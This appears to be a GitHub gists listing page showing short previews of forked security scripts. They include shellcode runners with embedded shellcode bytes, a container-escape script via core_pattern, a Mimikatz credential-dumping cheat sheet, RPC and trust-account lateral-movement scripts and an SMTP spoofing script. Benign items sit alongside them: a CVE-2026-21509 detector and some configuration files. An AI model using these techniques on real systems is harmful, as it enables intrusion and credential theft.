emdnaia
/ olecheck.py
Created
January 29, 2026 17:21
— forked from decalage2/olecheck.py
olecheck - a simple script to identify potential CVE-2026-21509 samples
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509 | |
| # using oletools - https://github.com/decalage2/oletools | |
| # Philippe Lagadec 2026-01-28 | |
| # NOTES: | |
| # According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509 | |
| # the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B", | |
| # corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy | |
| # Internet Explorer engine (aka Trident/MSHTML) from any application. | |
| # So to exploit CVE2026-21509 from a MS Office document, one could use either an OLE object |
emdnaia
/ JasonToddIsTheBestRobin.c
Created
September 25, 2025 17:25
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
emdnaia
/ enclave.c
Created
August 3, 2025 22:56
— forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
emdnaia
/ nginx-reverse-proxy-sing-box.conf
Created
March 19, 2025 02:14
— forked from bitcoinvps/nginx-reverse-proxy-sing-box.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| stream { | |
| map $ssl_preread_server_name $singbox { | |
| trojan.example.com trojan; | |
| trojan-ws.example.com trojan-ws; | |
| trojan-ws-6.example.com trojan-ws-6; | |
| vmess.example.com vmess; | |
| vmess-ws.example.com vmess-ws; | |
| vmess-ws-6.example.com vmess-ws-6; | |
| } | |
| upstream trojan { |
emdnaia
/ lsarlookupsids3_aes.py
Created
February 6, 2025 22:56
— forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
emdnaia
/ Dockerfile
Created
December 16, 2024 04:05
— forked from HoKim98/Dockerfile
Multi-screen (Multi-GPU) XFCE Settings
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright (c) 2023 Ho Kim (ho.kim@ulagbulag.io). All rights reserved. | |
| # Configure environment variables | |
| ARG ROCKYLINUX_VERSION="8" | |
| # Be ready for serving | |
| FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base | |
| # Install desktop environment dependencies | |
| RUN dnf install -y \ |
emdnaia
/ atexec_rpc.py
Created
November 29, 2024 04:41
— forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
emdnaia
/ core_pattern_escape.sh
Created
October 26, 2024 19:19
— forked from magisterquis/core_pattern_escape.sh
Script to escape a container with /proc/sys/kernel/core_pattern reusing the existing shell's stdio
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # core_pattern_escape.sh | |
| # Simple script to escape a container via /proc/sys/kernel/core_pattern | |
| # By J. Stuart McMurray | |
| # Created 20241026 | |
| # Last Modified 20241026 | |
| # Drop to /esc (or whatever name) in a container and... | |
| # |
emdnaia
/ Mimikatz-cheatsheet
Created
October 20, 2024 01:43
— forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
emdnaia
/ smtp.py
Created
September 27, 2024 03:08
— forked from w1lsec/smtp.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from socket import * | |
| mail_server = ("tantotesting.mail.protection.outlook.com", 25) | |
| client_socket = socket(AF_INET, SOCK_STREAM) | |
| helo = "helo tantomail.com" | |
| mail_from = "mail from: <testing@tantomail.com>" | |
| rcpt_to = "rcpt to: <john.doe@tantotesting.onmicrosoft.com>" | |
| mail = """from: \x1f <,><testing@tantomail.com>\r | |
| sender: "James Bond" <james.bond@tantotesting.onmicrosoft.com>\r |
NewerOlder